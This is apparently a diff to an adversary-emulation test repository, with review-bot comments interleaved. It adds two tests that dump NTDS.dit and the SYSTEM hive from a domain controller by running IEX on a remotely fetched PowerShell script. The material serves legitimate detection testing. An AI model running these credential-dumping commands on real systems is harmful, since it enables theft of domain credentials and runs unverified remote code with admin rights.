diff --git a/atomics/T1003.003/T1003.003.md b/atomics/T1003.003/T1003.003.md
index b45b8ae0..d73307cd 100644
--- a/atomics/T1003.003/T1003.003.md
+++ b/atomics/T1003.003/T1003.003.md
@@ -36,6 +36,10 @@ The following tools and techniques can be used to enumerate the NTDS file and th
 - [Atomic Test #9 - Create Volume Shadow Copy with diskshadow](#atomic-test-9---create-volume-shadow-copy-with-diskshadow)
+- [Atomic Test #10 - Copy NTDS in low level NTFS acquisition via MFT parsing](#atomic-test-10---Copy-NTDS-in-low-level-NTFS-acquisition-via-MFT-parsing)
+
+- [Atomic Test #11 - Copy NTDS in low level NTFS acquisition via fsutil](#atomic-test-11---Copy-NTDS-in-low-level-NTFS-acquisition-via-fsutil)
+
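Review bot: The two added TOC anchors are mixed case (`#atomic-test-10---Copy-NTDS-in-low-level-NTFS-acquisition-via-MFT-parsing`) while every existing entry, including the #9 context line just above, is all lowercase; generated heading ids are lowercased, so these two links will not resolve. Change them to `#atomic-test-10---copy-ntds-in-low-level-ntfs-acquisition-via-mft-parsing` and `#atomic-test-11---copy-ntds-in-low-level-ntfs-acquisition-via-fsutil`. If this file is produced by the repository's doc generator, the fix belongs there rather than in a hand edit.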
@@ -461,8 +465,76 @@ mkdir c:\exfil
 diskshadow.exe /s #(unknown)
 ```
+
+## Atomic Test #10 - Copy NTDS in low level NTFS acquisition via MFT parsing
+This test is intended to be run on a domain Controller.
+UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).
+
+**Supported Platforms:** Windows
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| extract_path | Path for extracted NTDS.dit | path | C:\Windows\Temp|
+
+
+
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
+
+
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (IWR 'https://raw.githubusercontent.com/kfallahi/UnderlayCopy/refs/heads/main/UnderlayCopy.ps1' -UseBasicParsing)
+Underlay-Copy -Mode MFT -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
+Underlay-Copy -Mode MFT -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
+```
+
+
+#### Cleanup Commands:
+```powershell
+remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue
+remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinue
+```
+
+
+
+
+## Atomic Test #11 - Copy NTDS in low level NTFS acquisition via fsutil
+This test is intended to be run on a domain Controller.
+UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).
+
+**Supported Platforms:** Windows
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| extract_path | Path for extracted NTDS.dit | path | C:\Windows\Temp|
+
+
+
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
+
+
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (IWR 'https://raw.githubusercontent.com/kfallahi/UnderlayCopy/refs/heads/main/UnderlayCopy.ps1' -UseBasicParsing)
+Underlay-Copy -Mode Metadata -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
+Underlay-Copy -Mode Metadata -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
+```
+
+
+#### Cleanup Commands:
+```powershell
+remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue
+remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinue
+```
+
diff --git a/atomics/T1003.003/T1003.003.yaml b/atomics/T1003.003/T1003.003.yaml
index 50f69f6b..f085d179 100644
--- a/atomics/T1003.003/T1003.003.yaml
+++ b/atomics/T1003.003/T1003.003.yaml
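Review bot: The attack commands in both new markdown tests fetch `refs/heads/main/UnderlayCopy.ps1` and pipe it straight into IEX, while the yaml in the same change pins `script_url` to commit 37f2e9b7…; the rendered docs therefore run whatever is on that branch at the moment, which is exactly the moving-target risk the yaml avoids. This looks like the markdown was hand-written instead of regenerated from the yaml: the command should read `IEX (IWR #{script_url} -UseBasicParsing)` and the Inputs table should carry a `script_url` row with the pinned default. The same table lists `extract_path` as type `path` whereas the yaml declares `string`; regenerating from the yaml would also settle that. The hunk starts in the context of Atomic Test #9 and ends at the yaml file header.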
@@ -261,3 +261,58 @@ atomic_tests: diskshadow.exe /s #(unknown) name: command_prompt elevation_required: true +- name: Copy NTDS in low level NTFS acquisition via MFT parsing + description: | + This test is intended to be run on a domain Controller. + + UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running). + supported_platforms: + - windows + input_arguments: + extract_path: + type: string + default: C:\Windows\Temp + description: Path for extracted NTDS.dit + script_url: + description: URL to UnderlayCopy script + type: url + default: https://raw.githubusercontent.com/kfallahi/UnderlayCopy/37f2e9b76b724bc1211437b14deaf1e76b21791e/UnderlayCopy.ps1 + executor: + command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + IEX (IWR #{script_url} -UseBasicParsing) + Underlay-Copy -Mode MFT -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit + Underlay-Copy -Mode MFT -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE + name: powershell + elevation_required: true + cleanup_command: | + remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue + remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinue + +- name: Copy NTDS in low level NTFS acquisition via fsutil + description: | + This test is intended to be run on a domain Controller. + + UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running). 
+ supported_platforms: + - windows + input_arguments: + extract_path: + type: string + default: C:\Windows\Temp + description: Path for extracted NTDS.dit + script_url: + description: URL to UnderlayCopy script + type: url + default: https://raw.githubusercontent.com/kfallahi/UnderlayCopy/37f2e9b76b724bc1211437b14deaf1e76b21791e/UnderlayCopy.ps1 + executor: + command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + IEX (IWR #{script_url} -UseBasicParsing) + Underlay-Copy -Mode Metadata -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit + Underlay-Copy -Mode Metadata -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE + name: powershell + elevation_required: true + cleanup_command: | + remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue + remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinue
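Review bot: Both new executors still `IEX (IWR #{script_url} -UseBasicParsing)` a remote script as an administrator on a domain controller with no integrity check; pinning `script_url` to commit 37f2e9b7… removes the branch-drift problem, but nothing verifies that what was downloaded is the reviewed content. Consider fetching the script to a local path in a prerequisite step and gating the import on a recorded digest, e.g. `if ((Get-FileHash $script -Algorithm SHA256).Hash -ne '<expected>') { throw 'UnderlayCopy.ps1 hash mismatch' }`, with the expected SHA256 stored next to the pinned URL. Separately, the second test is named `via fsutil` but its commands run `-Mode Metadata` and the description never mentions fsutil; if Metadata mode is the fsutil-based path, say so in the description (`Metadata mode reads the file through fsutil …`), otherwise rename the test to match what it does. The hunk's trailing context past the second cleanup_command is not visible here.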